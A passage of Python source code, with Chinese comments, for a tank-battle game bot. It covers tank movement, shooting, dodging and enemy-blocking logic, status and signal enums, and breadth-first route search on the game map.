route.is_not_found(): # 没有找到路线,这种情况不可能 return Action.STAY elif route.length == 0: # 说明自己和敌方重合,这种情况不应该出现 return Action.STAY x1, y1 = tank.xy x3, y3 = 
route[1].xy # 跳过 start action = Action.get_action(x1, y1, x3, y3) # move-action dx, dy = Action.DIRECTION_OF_ACTION_XY[action] ## 见到敌人就开火,否则移动 shootAction = action + 4 destroyedFields = [] # 会被用到两次,因此缓存一下 if self.canShoot: destroyedFields = self.get_destroyed_fields_if_shoot(action) for field in destroyedFields: if isinstance(field, TankField) and field.side == side: # 有队友,停止射击 break else: # 否则再判断是否应该射击 for field in destroyedFields: if isinstance(field, TankField) and field.side == oppSide: return shootAction # 到此处说明没有敌人,或者有队友 ## 优先移动 if map_.is_valid_move_action(tank, action): return action ## 遇到路障,射击 if self.canShoot: for field in destroyedFields: if isinstance(field, TankField) and field.side == side: return Action.STAY # 遇到队友,等待 return shootAction ## 也不能射击?于是等待 return Action.STAY def get_manhattan_distance_to(self, field): """ 获得自身到 field 的曼哈顿距离,不考虑中间地形 通常用于判断 field 与自身距离是否为 2 ,也就是中间相隔一个格子 Input: - field Field/BattleTank/... 具有 xy, x, y 属性的 field 对象 """ x1, y1 = self.xy x2, y2 = field.xy return get_manhattan_distance(x1, y1, x2, y2) def get_manhattan_distance_to_point(self, x2, y2): """ 对上一函数的补充,允许传入 xy 作为变量 """ x1, y1 = self.xy return get_manhattan_distance(x1, y1, x2, y2) def get_enemies_around(self): """ 返回获得身边的 tank 可能有多架 WARNING: 这个函数可以返回空值,也就是没有任何敌人在身旁的时候也可以使用 如果需要知道 enemies 是谁,那么建议直接调用这个函数来确定身边情况 Return: - tanks [TankField]/[] """ tank = self._tank map_ = self._map x1, y1 = tank.xy enemies = [] for dx, dy in get_searching_directions(x1, y1): x, y = tank.xy while True: x += dx y += dy if not map_.in_map(x, y): break currentFields = map_[x, y] if len(currentFields) == 0: # 没有对象 continue elif len(currentFields) > 1: # 多辆坦克 for field in currentFields: if isinstance(field, TankField) and field.side != tank.side: enemies.append(field) else: # len == 1 field = currentFields[0] if isinstance(field, (EmptyField, WaterField) ): continue elif not isinstance(field, TankField): # 说明这个方向上没有敌人 break elif field.side != tank.side: # 遇到了敌人 enemies.append(field) else: # 
遇到了队友 break return enemies def has_enemy_around(self): """ 周围是否存在敌军 """ return len(self.get_enemies_around()) > 0 def has_overlapping_enemy(self): """ 是否与敌方坦克重合 """ map_ = self._map tank = self._tank onSiteFields = map_[tank.xy] for field in onSiteFields: assert isinstance(field, TankField), "unexpected field %r" % field if field.side != tank.side: return True return False def get_overlapping_enemy(self): """ 获得与自身重叠的坦克 认为一般只与一架坦克重合,所以返回遇到的第一辆坦克 WARNING: - 这个函数调用前,必须先检查是否有重叠的敌人 Return: - tank TankField """ map_ = self._map tank = self._tank onSiteFields = map_[tank.xy] for field in onSiteFields: if field.side != tank.side: return field raise Exception("no overlapping enemy was found") def try_dodge(self, oppTank): """ 尝试回避对方 tank Input: - oppTank TankField/BattleTank 能够通过 x, y, xy 获取坐标值的坦克对象 Return: - actions [int] 能够闪避开的行为值,可能为空 """ tank = self._tank map_ = self._map side = tank.side base = map_.bases[side] oppBase = map_.bases[1- side] teammate = map_.tanks[side][1 - tank.id] battler = self x1, y1 = tank.xy x2, y2 = oppTank.xy if battler.is_in_our_site(): x3, y3 = base.xy # 在本方地盘,优先朝自己基地的方向闪现 else: x3, y3 = oppBase.xy # 在对方地盘,优先朝着对方基地的方向闪现 actions = [] for dx, dy in get_searching_directions(x1, y1, x3, y3, middle_first=True): # 优先逃跑向对方基地 x4 = x1 + dx y4 = y1 + dy if x4 == x2 or y4 == y2: # 逃跑方向不对 continue action = Action.get_action(x1, y1, x4, y4) if map_.is_valid_move_action(tank, action): actions.append(action) # # 应该朝着远离队友的方向闪避? 
5ce915add2337e01c7abd895 # # 因为 BUG ,这个功能尚未实现 5ce9ce0cd2337e01c7acfd5c # # # 我决定不删掉这里的任何一条 DEBUG 注释来纪念这个花了 5 个小时都没有搞懂的 BUG # 没有错,把下面这段全部注释掉,这个程序就一点 BUG 都没有了 # '''def _cmp(action): #debug_print("Inner: ", id(map_), id(battler), id(teammate), id(action), action) #map_.debug_print_out() with map_.simulate_one_action(tank, action): #map_.debug_print_out() return battler.get_manhattan_distance_to(teammate)''' #debug_print("Before:", id(map_), id(battler), id(teammate), id(action), action) #map_.debug_print_out() #debug_print(teammate.previousAction) '''if battler.on_the_same_line_with(teammate): # 仅仅在处于同一行时成立 #debug_print(actions) actions.sort(key=lambda action: _cmp(action), reverse=True) #debug_print(actions)''' #debug_print(teammate.previousAction, "\n") # 因为一些奇怪的原因,地图没有正确回滚!! #map_.debug_print_out() #debug_print("After: ", id(map_), id(battler), id(teammate), id(action), action) #debug_print("") ### END BUG ### return actions def can_dodge(self): """ 当前地形是否拥有闪避的机会,用于判断是否处在狭路,与 len( try_dodge ) > 0 不等价 """ tank = self._tank map_ = self._map x, y = self._tank.xy actions = [] for dx, dy in get_searching_directions(x, y): x3 = x + dx y3 = y + dy moveAction = Action.get_action(x, y, x3, y3) if map_.is_valid_move_action(moveAction): actions.append(moveAction) if len(actions) < 2: # 不可能闪避 return False if len(actions) >= 3: # 可以 return True assert len(actions) == 2 return not Action.is_opposite(*actions) # 相反方向,无法闪避,否则可以 def break_brick_for_dodge(self, oppTank): """ 尝试凿开两边墙壁,以闪避敌人进攻 适用条件: 自己处在 WAIT_FOR_MARCHING 状态,身边没有遇敌的时候 """ tank = self._tank map_ = self._map side = tank.side oppSide = 1 - side base = map_.bases[side] oppBase = map_.bases[oppSide] x1, y1 = tank.xy x2, y2 = oppTank.xy if self.is_in_our_site(): # 选择性同 try_dodge x3, y3 = base.xy else: x3, y3 = oppBase.xy actions = [] for dx, dy in get_searching_directions(x1, y1, x3, y3, middle_first=True): # 按照惯例,优先凿开移向对方基地的墙 x3 = x1 + dx y3 = y1 + dy if x3 == x2 or y3 == y2: # 方向不对,不能凿开相隔的墙 continue # 需要判断两边的墙壁是否为不可凿开的对象 
if not map_.in_map(x3, y3): continue fields = map_[x3, y3] assert len(fields) == 1, "not suit for current situation" field = fields[0] if isinstance(field, BrickField): action = Action.get_action(x1, y1, x3, y3) + 4 # 射击行为一定成功 actions.append(action) else: # 其他都是不适用的 continue return actions def move_to(self, oppTank): """ 返回 self -> oppTank 的移动 Input: oppTank TankField/BattleTank 所有带坐标的 tank 对象 """ x1, y1 = self._tank.xy x2, y2 = oppTank.xy assert x1 == x2 or y1 == y2, "can't be used when two tanks are not in line" return Action.get_action(x1, y1, x2, y2) def shoot_to(self, oppTank): """ 返回 self -> oppTank 的射击行为,相当于 move + 4 """ return self.move_to(oppTank) + 4 def on_the_same_line_with(self, field, ignore_brick=True): """ 是否和某个块处在同一条直线上 Input: field 任何带坐标的 tank 对象 ignore_brick bool 是否忽略土墙的阻挡 """ tank = self._tank map_ = self._map x1, y1 = tank.xy x2, y2 = field.xy if x1 != x2 and y1 != y2: # 坐标上直接可以否掉的情况 return False elif (x1, y1) == (x2, y2): # 重叠,这种情况一般不会出现,但是还是判断一下 return True if x1 == x2: dx = 0 dy = np.sign(y2 - y1) elif y1 == y2: dx = np.sign(x2 - x1) dy = 0 x, y = tank.xy while True: x += dx y += dy if not map_.in_map(x, y): break _fields = map_[x, y] if len(_fields) == 0: continue elif len(_fields) == 2: if field.xy == (x, y): # 说明处在在多人坦克里 return True else: # 否则不算 return False else: _field = _fields[0] if _field.xy == field.xy: # 和这个块坐标相同(注意不要用 is 来判断,因为传入的可能是 BattleTank) return True elif isinstance(_field, (EmptyField, WaterField) ): continue elif isinstance(_field, BrickField): if ignore_brick: # 这种情况将 brick 视为空 continue else: return False else: return False # 其他所有的 block 类型均视为 False # 没有检查到受阻的情况,那么就是在同一条直线上了 return True def back_away_from(self, oppTank): """ 背向远离地方坦克 """ return (self.move_to(oppTank) + 2) % 4 # 获得相反方向 def get_destroyed_fields_if_shoot(self, action): """ 如果向 action 对应的方向射击,那么可以摧毁什么东西? 
------------------------------------------------------------ 主要用于 move 不安全而又不想白白等待的情况,尝试采用进攻开路 也可以用于其他问题的判断 Input: - action int 原始的移动行为(虽然事实上也可以是射击 :) Return: - fields [Field] 将被摧毁的对象 """ assert Action.is_move(action) or Action.is_shoot(action) tank = self._tank map_ = self._map action %= 4 x, y = tank.xy dx, dy = Action.DIRECTION_OF_ACTION_XY[action] while True: x += dx y += dy if not map_.in_map(x, y): break fields = map_[x, y] if len(fields) == 0: # 没有对象 continue elif len(fields) > 1: # 多辆坦克 return fields else: field = fields[0] if isinstance(field, (WaterField, EmptyField) ): continue elif isinstance(field, SteelField): return [] else: return fields return [] def will_destroy_a_brick_if_shoot(self, action): """ 如果当前回合射击,是否能够摧毁一个墙 """ destroyedFields = self.get_destroyed_fields_if_shoot(action) if len(destroyedFields) == 1: field = destroyedFields[0] if isinstance(field, BrickField): return True return False def is_face_to_enemy_base(self, ignore_brick=False): """ 是否直面对方基地,或者是与敌人基地处在同一条直线上 (一个历史遗留接口) Input: - ignore_brick bool 是否忽略土墙,如果忽略,那么只需要基地和坦克 处在同一直线上即可 """ oppBase = self._map.bases[1 - self.side] return self.on_the_same_line_with(oppBase, ignore_brick=ignore_brick) def is_closest_to(self, field, allow_diagonal=True): """ 是否紧贴某个 field 也就是与之相邻或恰为对角 Input: - field Field 事实上只要带有 xy 属性的类都可以 - allow_diagonal bool 是否将对角线关系也算入 """ x1, y1 = self.xy x2, y2 = field.xy isInnermost = ( np.abs(x1 - x2) <= 1 and np.abs(y1 - y2) <= 1 ) if allow_diagonal: return isInnermost else: return isInnermost and (x1 == x2 or y1 == y2) # 还需要共线 def get_enemy_behind_brick(self, action, interval=0): """ 返回行为对应的方向后的围墙后的敌人 乙方坦克和围墙间可以有任意空位 围墙到敌方坦克间至多有 interval 个空位 Input: - action int 移动/射击行为,确定方向 - interval int 最远检查到距离墙多远的位置? 
interval = 0 表示只检查最靠近墙的那个位置 特殊地 interval = -1 表示不限制 interval Return: - tank TankField/None 敌人对应的 tank 对象,多个敌人只返回一个 情况不符则返回 None """ tank = self._tank map_ = self._map x1, y1 = tank.xy dx, dy = Action.DIRECTION_OF_ACTION_XY[action % 4] # 检查前方是否是墙 x2, y2 = x1, y1 while True: x2 += dx y2 += dy if not map_.in_map(x2, y2): return None fields = map_[x2, y2] if len(fields) == 0: continue elif len(fields) > 1: return None else: field = fields[0] if isinstance(field, BrickField): break # 此时 x2, y2 位置上是一个 Brick elif isinstance(field, (WaterField, EmptyField) ): continue else: return None # 检查前方是否有敌方坦克 x3, y3 = x2, y2 currentInterval = -1 while True: currentInterval += 1 if interval != -1 and currentInterval > interval: break x3 += dx y3 += dy if not map_.in_map(x3, y3): break fields = map_[x3, y3] if len(fields) == 0: continue elif len(fields) > 1: for field in fields: if isinstance(field, TankField) and field.side != tank.side: return field else: field = fields[0] if isinstance(field, TankField) and field.side != tank.side: return field elif isinstance(field, (WaterField, EmptyField) ): continue else: # 除了水路和空地可以继续搜索外,其他情况均直接结束 break return None def has_enemy_behind_brick(self, action): return self.get_enemy_behind_brick(action) is not None def get_nearest_enemy(self): #, block_teammate=False, isolate=False): """ 获得最近的敌人,移动距离 Input: - isolate bool 是否只考虑离自己最近,而不从团队整体考虑 如果联系整个团队,那么离自己最近的敌人定义为与我之间间隔的步数 和与我的队友之间间隔的步数差最小的敌人 Return: - enemy TankField """ '''tank = self._tank map_ = self._map _enemies = map_.tanks[1 - tank.side] enemies = [ enemy for enemy in _enemies if not enemy.destroyed ] # 已经被摧毁的敌人就不考虑了 if len(enemies) == 0: # 胜利? return None if len(enemies) < 2: return enemies[0] # TODO: # 两种情况的决策顺序是有差别的,一个是见到走不通就 block_teammate = False 另一个是如果全部都走不通 # 就全部 block_teammate = False ,这可能会引发问题? 
if not isolate: # # 注:这是一个糟糕的设计,因为 BattleTank 对象最初被设计为只懂得单人决策的对象 # 他不应该知道队友的行为,但是此处打破了这个规则 # teammate = BattleTank( map_.tanks[tank.side][ 1 - tank.id ] ) if teammateBattler.destroyed: pass else: deltaLengthWithEnemyList = [] for enemy in enemies: route1 = self.get_route_to_enemy_by_move(enemy) if route1.is_not_found(): route1 = self.get_route_to_enemy_by_move(enemy, block_teammate=False) if route1.is_not_found(): # 我无法到达敌人的位置??? continue route2 = teammateBattler.get_route_to_enemy_by_move(enemy) if route2.is_not_found(): route2 = teammateBattler.get_route_to_enemy_by_move(enemy, block_teammate=False) if route2.is_not_found(): deltaLength = route1.length # 这样做是否合理? else: deltaLength = route1.length - route2.length deltaLengthWithEnemyList.append( (deltaLength, enemy) ) idx = deltaLengthWithEnemyList.index( min(deltaLengthWithEnemyList, key=lambda tup: tup[0]) ) return deltaLengthWithEnemyList[idx][1] # 否则为单人决策 routes = [ self.get_route_to_enemy_by_move(enemy) for enemy in enemies ] if all( route.is_not_found() for route in routes ): # 均不可到达? routes = [ self.get_route_to_enemy_by_move(enemy, block_teammate=False) for enemy in enemies ] # 因为队友阻塞 ? 
routeWithEnemyList = [ (route, enemy) for route, enemy in zip(routes, enemies) if not route.is_not_found() # 队友阻塞导致 -1 需要去掉 ] idx = routeWithEnemyList.index( min(routeWithEnemyList, key=lambda tup: tup[0].length) ) return routeWithEnemyList[idx][1]''' tank = self._tank map_ = self._map enemies = [ enemy for enemy in map_.tanks[1 - tank.side] if not enemy.destroyed ] # 已经被摧毁的敌人就不考虑了 battler = self teammate = BattleTank( map_.tanks[tank.side][ 1 - tank.id ] ) if not teammate.destroyed: return min( enemies, key=lambda enemy: battler.get_manhattan_distance_to(enemy) - teammate.get_manhattan_distance_to(enemy) ) # 综合队友的情况进行考虑,对方离我近,同时离队友远,那么那么更接近于我 else: return min( enemies, key=lambda enemy: battler.get_manhattan_distance_to(enemy) ) def check_is_outer_wall_of_enemy_base(self, field, layer=2): """ 检查一个 field 是否为敌方基地的外墙 外墙被视为基地外的 layer 层 Brick """ if not isinstance(field, BrickField): return False map_ = self._map tank = self._tank oppBase = map_.bases[1 - tank.side] x1, y1 = oppBase.xy x2, y2 = field.xy return ( np.abs( x1 - x2 ) <= layer and np.abs( y1 - y2 ) <= layer ) def get_enemy_delay_if_bypass_me(self, oppBattler): """ 假设自己不移动,敌人必须要饶过我,那么他将因此延迟多少步 """ route1 = oppBattler.get_shortest_attacking_route(ignore_enemies=True, bypass_enemies=False) route2 = oppBattler.get_shortest_attacking_route(ignore_enemies=False, bypass_enemies=True) if route1.is_not_found(): # TODO: 如何处理本来就找不到路的情况? return INFINITY_ROUTE_LENGTH if route2.is_not_found(): return INFINITY_ROUTE_LENGTH delay = route2.length - route1.length assert delay >= 0 # 显然必定会大于 0 ! 
return delay def can_block_this_enemy(self, oppBattler): """ 假设自己不移动,对方将不得不绕路,或者他将因此无路可走,那么就算是成功堵住了他 """ delay = self.get_enemy_delay_if_bypass_me(oppBattler) if delay == INFINITY_ROUTE_LENGTH: # 让敌人根本无路可走 return True return (delay >= 2) # 造成两步步以上的延迟,那么就算堵路成功 #{ END 'tank.py' }# #{ BEGIN 'strategy/signal.py' }# class Signal(object, metaclass=UniqueIntEnumMeta): __offset__ = 200 INVALID = -1 # 无效信号 NONE = 0 # 空信号 UNHANDLED = 1 # 未处理团队信号,通常是因为有更紧急的状况而没有运行到相应的处理信号的位置 CANHANDLED = 2 # 未能处理团队信号,通常是因为尝试处理但是发现不合适 PREPARE_FOR_BREAK_BRICK = 11 # 团队信号,准备破墙,先给自己寻找后路 READY_TO_PREPARE_FOR_BREAK_BRICK = 12 # 队员信号,准备好为破墙而凿开两边墙壁 FORCED_TO_BREAK_BRICK = 13 # 团队信号,强制破墙 READY_TO_BREAK_BRICK = 14 # 队员信号,准备要破墙 SUGGEST_TO_BREAK_OVERLAP = 15 # 团队信号,建议马上打破重叠 READY_TO_BREAK_OVERLAP = 16 # 队员信号,准备要主动打破重叠 FORCED_MARCH = 17 # 团队信号,强制行军 READY_TO_FORCED_MARCH = 18 # 队员信号,准备强制行军 SHOULD_LEAVE_TEAMMATE = 19 # 团队信号,需要和队友打破重叠 READY_TO_LEAVE_TEAMMATE = 20 # 队员信号,准备和队友打破重叠 SUGGEST_TO_BACK_AWAY_FROM_BRICK = 21 # 团队信号,建议反向远离墙壁 READY_TO_BACK_AWAY_FROM_BRICK = 22 # 队员信号,准备反向远离墙壁 @staticmethod def is_break(signal): """ 该信号是否意味着沟通停止 也就是是否为未处理或无法处理 """ return signal in ( __class__.INVALID, __class__.UNHANDLED, __class__.CANHANDLED, ) #{ END 'strategy/signal.py' }# #{ BEGIN 'strategy/status.py' }# class Status(object, metaclass=UniqueIntEnumMeta): __offset__ = 100 NONE = 0 # 空状态 AGGRESSIVE = 1 # 侵略性的 STALEMENT = 2 # 僵持的 DEFENSIVE = 3 # 防御性的 WITHDRAW = 4 # 撤退性的 DYING = 5 # 准备要挂了 DIED = 6 # 已经挂了 RELOADING = 9 # 正在装弹,下回合无法射击 ENCOUNT_ENEMY = 17 # 遇到敌人 ENCOUNT_ONE_ENEMY = 18 # 遇到一个敌人 ENCOUNT_TWO_ENEMY = 19 # 遇到两个敌人 OVERLAP_WITH_ENEMY = 20 # 正在和敌人重叠 KEEP_ON_MARCHING = 21 # 继续行军 READY_TO_ATTACK_BASE = 22 # 准备拆基地 READY_TO_FIGHT_BACK = 23 # 准备反击 READY_TO_DODGE = 24 # 准备闪避敌人 READY_TO_KILL_ENEMY = 25 # 准备击杀敌人 READY_TO_BLOCK_ROAD = 26 # 准备堵路 KEEP_ON_OVERLAPPING = 27 # 等待与自己重叠的敌人的决策 WAIT_FOR_MARCHING = 28 # 存在风险,等待进攻 HAS_ENEMY_BEHIND_BRICK = 29 # 隔墙有人 PREVENT_BEING_KILLED = 30 # 为了防止被射击而停下 HUNTING_ENEMY = 31 # 主动追杀敌军 
ACTIVE_DEFENSIVE = 32 # 主动防御状态 WILL_DODGE_TO_LONG_WAY = 33 # 遭遇敌人自己没有炮弹,为了保命而闪避,但是增加了攻击路线长度 OPPOSITE_SHOOTING_WITH_ENEMY = 34 # 正在和敌人对射 READY_TO_BACK_AWAY = 35 # 假装逃跑 READY_TO_CLEAR_A_ROAD_FIRST = 36 # 进攻时预先清除与自己相隔一步的土墙 READY_TO_DOUBLE_KILL_ENEMIES = 37 # 遇到敌人重叠在一起,尝试和两个敌人同归于尽 READY_TO_LEAVE_TEAMMATE = 38 # 准备和队友打破重叠 FACING_TO_ENEMY_BASE = 39 # 正面敌人基地,或者和敌人基地处在同一直线上 READY_TO_FOLLOW_ENEMY = 40 # 准备跟随墙后敌人的移动方向 READY_TO_WITHDRAW = 41 # 准备后撤 GRARD_OUR_BASE = 42 # 已经到达我方基地附近,进入守卫状态 STAY_FOR_GUARDING_OUR_BASE = 43 # 已经到达我方基地附近,准备停留等待 WAIT_FOR_WITHDRAWING = 44 # 等待回防,可能是由于敌人阻挡 MOVE_TO_ANOTHER_GUARD_POINT = 45 # 向着另一个 guard point 移动 ENEMY_MAY_APPEAR_BEHIND_BRICK = 46 # 也许会有敌人出现在墙后 READY_TO_CUT_THROUGH_MIDLINE = 47 # 墙后停止不前时,准备打通中线 TRY_TO_BREAK_ALWAYS_BACK_AWAY = 48 # 尝试打破一直回头的状态 FORCED_MARCHING = 49 # 强制行军,强攻,不考虑某些可能的风险 FORCED_WITHDRAW = 50 # 强制撤退,不考虑可能的风险 READY_TO_PREPARE_FOR_BREAK_BRICK = 51 # 准备为破墙而准备闪避路线 READY_TO_BREAK_BRICK = 52 # 准备破墙 READY_TO_BREAK_OVERLAP = 53 # 准备主动打破重叠 READY_TO_FORCED_MARCH = 54 # 准备主动强攻 FORCED_STOP_TO_PREVENT_TEAM_HURT = 55 # 防止团队间相互攻击而强制停止 READY_TO_BACK_AWAY_FROM_BRICK = 56 # 准备主动反向远离墙壁 HELP_TEAMMATE_ATTACK = 57 # 合作拆家,并且帮助队友进攻 ATTEMPT_TO_KILL_ENEMY = 58 # 主动防御时,尝试击杀敌军,这个状态可以用来记忆行为 BLOCK_ROAD_FOR_OUR_BASE = 59 # 主动防御时,遇到敌方面向基地,但没有炮弹,自己又恰好能阻挡在中间 SACRIFICE_FOR_OUR_BASE = 60 # 主动防御时,遇到敌方下一炮打掉基地,自己又恰好能阻挡 __Status_Name_Cache = None @staticmethod def get_name(status): """ 通过状态值自动判定方法 """ if __class__.__Status_Name_Cache is None: cache = __class__.__Status_Name_Cache = {} for k, v in __class__.__dict__.items(): if not k.startswith("_"): if isinstance(v, int): key = k.title() cache[v] = key cache = __class__.__Status_Name_Cache return cache.get(status, None) # 应该保证一定有方法? 
#{ END 'strategy/status.py' }# #{ BEGIN 'strategy/label.py' }# class Label(object, metaclass=UniqueIntEnumMeta): __offset__ = 300 NONE = 0 BREAK_OVERLAP_SIMULTANEOUSLY = 1 # 会和我同时打破重叠 SIMULTANEOUSLY_SHOOT_TO_BREAK_OVERLAP = 2 # 回合我方同时以射击的方式打破重叠 IMMEDIATELY_BREAK_OVERLAP_BY_MOVE = 3 # 当敌人和我方坦克重叠时,对方立即与我打破重叠 KEEP_ON_WITHDRAWING = 4 # 我方坦克持久化撤退状态 DONT_WITHDRAW = 5 # 强制性要求一个队员不再防御 ALWAYS_BACK_AWAY = 6 # 我方坦克总是尝试回头 __Status_Name_Cache = None @staticmethod def get_name(status): """ 通过状态值自动判定方法 """ if __class__.__Status_Name_Cache is None: cache = __class__.__Status_Name_Cache = {} for k, v in __class__.__dict__.items(): if not k.startswith("_"): if isinstance(v, int): key = k.title() cache[v] = key cache = __class__.__Status_Name_Cache return cache.get(status, None) # 应该保证一定有方法? #{ END 'strategy/label.py' }# #{ BEGIN 'strategy/utils.py' }# def fake_map_matrix_T_without_enemy(map, mySide): """ 伪造一个没有敌方坦克的地图类型矩阵 WARNING: 首先检查是不是对方 tank ,因为可能遇到对方已经死亡或者两方坦克重合 这种时候如果己方坦克恰好在这个位置,就会被删掉,assert 不通过 """ map_ = map oppSide = 1 - mySide cMatrixMap = map_.matrix_T.copy() for oppTank in map_.tanks[oppSide]: if (cMatrixMap[oppTank.xy] == Field.TANK + 1 + oppSide or cMatrixMap[oppTank.xy] == Field.MULTI_TANK # 还需要考虑重叠的坦克 ): cMatrixMap[oppTank.xy] = Field.EMPTY return cMatrixMap def fake_map_matrix_T_thinking_of_enemy_as_steel(map, mySide): """ 伪造一个敌方坦克视为钢墙的地图类型矩阵 用于在堵路时估计对方时候存在绕路的可能 """ map_ = map oppSide = 1 - mySide cMatrixMap = map_.matrix_T.copy() for oppTank in map_.tanks[oppSide]: if (cMatrixMap[oppTank.xy] == Field.TANK + 1 + oppSide or cMatrixMap[oppTank.xy] == Field.MULTI_TANK # 还需要考虑重叠的坦克 ): cMatrixMap[oppTank.xy] = Field.STEEL return cMatrixMap def get_manhattan_distance(x1, y1, x2, y2): """ 获得 (x1, y1) -> (x2, y2) 曼哈顿距离 """ return np.abs(x1 - x2) + np.abs(y1 - y2) #{ END 'strategy/utils.py' }# #{ BEGIN 'strategy/route.py' }# INFINITY_WEIGHT = -1 # 无穷大的权重,相当于不允许到达 INFINITY_ROUTE_LENGTH = -1 # 无穷大的路径长度,相当于找不到路径 DUMMY_ACTION = -2 # 空行为 NONE_ACTION = -1 # 上回合什么都不做,相当于停止,专门用于 
DIRECTIONS_RULD = ( ( 1, 0), (0, -1), (-1, 0), (0, 1) ) # 右上左下 DIRECTIONS_LURD = ( (-1, 0), (0, -1), ( 1, 0), (0, 1) ) # 左上右下 DIRECTIONS_RDLU = ( ( 1, 0), (0, 1), (-1, 0), (0, -1) ) # 右下左上 DIRECTIONS_LDRU = ( (-1, 0), (0, 1), ( 1, 0), (0, -1) ) # 左下右上 DEFAULT_BLOCK_TYPES = ( Field.STEEL, Field.WATER, ) DEFAULT_DESTROYABLE_TYPES = ( Field.BRICK, ) #------------------------ # 通常需要额外考虑的类型有 # # 1. 两方基地 # 2. 己方坦克和对方坦克 #------------------------ def get_searching_directions(x1, y1, x2=None, y2=None, x_axis_first=False, middle_first=False): """ 获得从 (x1, y1) -> (x2, y2) 最优的搜索方向顺序 Input: - (x1, y1) 起点坐标 - (x2, y2) 终点坐标,可以没有,那么将通过 (x1, y1) 在地图中的相对位置, 对应着左上、左下、右上、右下四个区域,确定最佳的搜索顺序 - x_axis_first bool 是否采用 x 轴方向优先的搜索方式。默认以垂直方向优先, 也就是如果存在到达目标坐标的两条长度相同的路径, 会优先从 y 轴方向移动过去,即先上下移动,后左右移动。 若选择以水平方向优先,则先左右移动,后上下移动。 优先上下移动通常用于侵略,优先左右移动通常用于防御 - middle_first bool 是否采用中路优先的搜索方式。默认不采用,而是优先从边路 搜索,如果边路和中路有距离相等的路径,那么优先从边路 走,如果中路发生冲突,就可以减小被敌人牵制的概率 注: x 轴优先仅仅在中路优先的成立下才有意义,如果是旁路搜索,则对 x 轴优先的 设置是无效的 """ if x2 is None or y2 is None: # 如果 x2, y2 为空,则默认以地图中点作为目标 x2 = MAP_WIDTH // 2 y2 = MAP_HEIGHT // 2 if ( x2 - x1 >= 0 ) and ( y2 - y1 >= 0 ): if middle_first: return DIRECTIONS_DRUL if not x_axis_first else DIRECTIONS_RDLU else: return DIRECTIONS_LDRU elif ( x2 - x1 >= 0 ) and ( y2 - y1 <= 0 ): if middle_first: return DIRECTIONS_URDL if not x_axis_first else DIRECTIONS_RULD else: return DIRECTIONS_LURD elif ( x2 - x1 <= 0 ) and ( y2 - y1 >= 0 ): if middle_first: return DIRECTIONS_DLUR if not x_axis_first else DIRECTIONS_LDRU else: return DIRECTIONS_RDLU elif ( x2 - x1 <= 0 ) and ( y2 - y1 <= 0 ): if middle_first: return DIRECTIONS_ULDR if not x_axis_first else DIRECTIONS_LURD else: return DIRECTIONS_RULD raise Exception def _BFS_search_all_routes_for_move(start, end, map_matrix_T, weight_matrix_T, block_types=DEFAULT_BLOCK_TYPES, x_axis_first=False, middle_first=False): """ BFS 搜索从 start -> end 的所有路径路径,由短到长依次返回 ---------------------------------------------------------------------------- Input: - start 
(int, int) 起始坐标 (x1, y2) - end (int, int) 终点坐标 (x2, y2) ,其对应的 field 类型必须不在 block_types 的定义里,否则查找到的路径为空 - map_matrix_T np.array( [[int]] ) field 类型值的矩阵的转置,坐标形式 (x, y) - weight_matrix_T np.array( [[int]] ) 每个格子对应节点的权重,形状与坐标形式同上 - block_types [int] 不能够移动到的 field 类型 WARNING: 需要自行指定不能够到达的基地、坦克的类型 - x_axis_first bool 是否优先搜索 x 轴方向 - middle_first bool 是否采用中路优先的搜索 Yield From: - routes [Route] 所有可以到达的路径。如果没有搜索到可以到达的路径,则返回空路径 ---------------------------------------------------------------------------- def struct Node: // 定义节点模型 [ "xy": (int, int) 目标节点 "parent": Node/None 父节点 "step": int ( >= 0 ) 还差几步到达,为 0 表示到达,初始值为 weight - 1 "weight": const int ( >= 1 ) 权重,即搜索时需要在其上耗费的步数 "last_action": const int 通过什么操作到达这个节点,该情况为移动 ] """ x1, y1 = start x2, y2 = end width, height = map_matrix_T.shape # width, height 对应着转置前的 宽高 matrixMap = map_matrix_T matrixWeight = weight_matrix_T matrixCanMoveTo = np.ones_like(matrixMap, dtype=np.bool8) for _type in block_types: matrixCanMoveTo &= (matrixMap != _type) # debug_print("map:\n", matrixMap.T) # debug_print("weight:\n", matrixWeight.T) # debug_print("can move on:\n", matrixCanMoveTo.astype(np.int8).T) startNode = [ (x1, y1), None, 0, # 初始节点本来就已经到达了 0, # 初始节点不耗费步数 NONE_ACTION, ] queue = deque() # queue( [Node] ) matrixMarked = np.zeros_like(matrixMap, dtype=np.bool8) if DEBUG_MODE: matrixDistance = np.full_like(matrixMap, -1) queue.append(startNode) # init _foundRoute = False while len(queue) > 0: node = queue.popleft() if node[2] > 0: # 还剩 step 步 node[2] -= 1 queue.append(node) # 相当于下一个节点 continue x, y = node[0] if (x, y) == end: # 到达终点 _foundRoute = True yield Route(node) continue if matrixMarked[x, y]: continue matrixMarked[x, y] = True if DEBUG_MODE: matrixDistance[x, y] = _get_route_length_by_node_chain(node) for dx, dy in get_searching_directions(x1, x2, y1, y2, x_axis_first=x_axis_first, middle_first=middle_first): x, y = node[0] x3 = x + dx y3 = y + dy if (not (0 <= x3 < width and 0 <= y3 < height) # not in map or not matrixCanMoveTo[x3, 
y3] ): continue weight = matrixWeight[x3, y3] queue.append([ (x3, y3), node, weight-1, weight, MOVE_ACTION, ]) ''' if DEBUG_MODE: debug_print("distance matrix:\n", matrixDistance.T) ''' if not _foundRoute: yield Route() # 空节点 def _BFS_search_all_routes_for_shoot(start, end, map_matrix_T, move_weight_matrix_T, shoot_weight_matrix_T, block_types=DEFAULT_BLOCK_TYPES, destroyable_types=DEFAULT_DESTROYABLE_TYPES, x_axis_first=False, middle_first=False): """ BFS 搜索从 start 开始到击中 end 的所有路径,由短到长依次返回 ---------------------------------------------------------------------------- 实现思路: 通过射击的方式能够比单纯通过移动的方式更快地接近目标,这是显而易见的,毕竟炮弹可以飞行。 于是,将地图划分为两个区域,一个是可以发动射击的区域,它们仅仅与目标处在同一行或同一列的位置上 另一个就是常规的移动可达的区域。搜索过程中对着两种情况下相应的节点权重做区分对待即可。 --------------------------------------------------------------------------- Input: - start (int, int) 起始坐标 (x1, y2) - end (int, int) 终点坐标 (x2, y2) ,其对应的 field 类型必须不在 destroyable_types 的定义里,否则查找到的路径为空 - map_matrix_T np.array( [[int]] ) field 类型值的矩阵的转置,坐标形式 (x, y) - move_weight_matrix_T np.array( [[int]] ) 移动到这个格子所需的步数 - shoot_weight_matrix_T np.array( [[int]] ) 炮弹到达这个格子所需的步数 - block_types [int] 不能够移动到的 field 类型 WARNING: 需要自行指定不能被攻击的基地、坦克的类型 - destroyable_types [int] 